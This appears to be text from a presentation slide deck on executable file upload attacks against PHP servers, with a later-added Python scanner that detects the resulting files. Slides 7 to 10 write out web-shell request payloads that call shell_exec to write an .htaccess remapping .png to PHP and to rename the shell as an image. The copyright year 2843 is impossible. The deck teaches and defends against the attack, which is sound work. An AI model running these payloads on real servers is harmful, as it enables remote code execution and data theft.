Demonstration of Executable File Upload Attack
- 7. Copyright © 2843 all rights reserved.
evil.php?1=shell_exec&2=echo%20AddHandler%20application/x-httpd-php%20.png%20>%20.htaccess;mv%20evil.php%20evil.png;
evil.php
- 8.
• Rename the PHP file to an image file
• Create .htaccess
AddHandler application/x-httpd-php .png
.htaccess
evil.png
- 9.
.htaccess
evil.png
evil.png?1=shell_exec&2=echo%20"<?php%20phpinfo();%20?>"%20>%20hoge.png
- 10.
.htaccess
evil.png
<?php phpinfo(); ?>
hoge.png
- 12.
• Information leakage
• File tampering
• Attacks on other servers
• Malware infection
• Execution of arbitrary scripts
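A defender-side check for the end state shown on slides 8 to 10, added here as an example and not part of the original slides: it walks an upload directory and flags any `.htaccess` (especially one binding a PHP handler) and any image-named file containing a PHP open tag. The function names, the extension list and the sample files are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Directives that can bind a PHP handler to an extension from inside .htaccess.
HANDLER_RE = re.compile(
    r"^\s*(AddHandler|AddType|SetHandler)\b.*php", re.IGNORECASE | re.MULTILINE)
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif"}  # assumed upload whitelist
PHP_TAG = b"<?php"

def scan_upload_dir(root):
    """Return sorted (relative_path, reason) findings under an upload directory."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "rb") as fh:
                data = fh.read(1 << 20)  # only the first 1 MiB is inspected
            ext = os.path.splitext(name)[1].lower()
            if name == ".htaccess":
                if HANDLER_RE.search(data.decode("latin-1")):
                    findings.append((rel, "htaccess maps a PHP handler"))
                else:
                    findings.append((rel, "unexpected .htaccess in upload dir"))
            elif ext in IMAGE_EXTS and PHP_TAG in data.lower():
                findings.append((rel, "PHP open tag inside image file"))
    return sorted(findings)

def build_sample(root):
    """Constructed sample mirroring the slides' end state, plus one clean PNG."""
    samples = {
        ".htaccess": b"AddHandler application/x-httpd-php .png\n",
        "evil.png": b"<?php /* placeholder body */ ?>",
        "hoge.png": b"<?php phpinfo(); ?>\n",
        "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)

def demo():
    """Build the constructed sample in a temp dir and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        return scan_upload_dir(root)

if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

Setting `AllowOverride None` for the upload directory in the main Apache configuration makes Apache ignore any `.htaccess` written there, which removes the handler remapping step entirely.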
- 13.
Thank you for your attention.
ohtsuki2843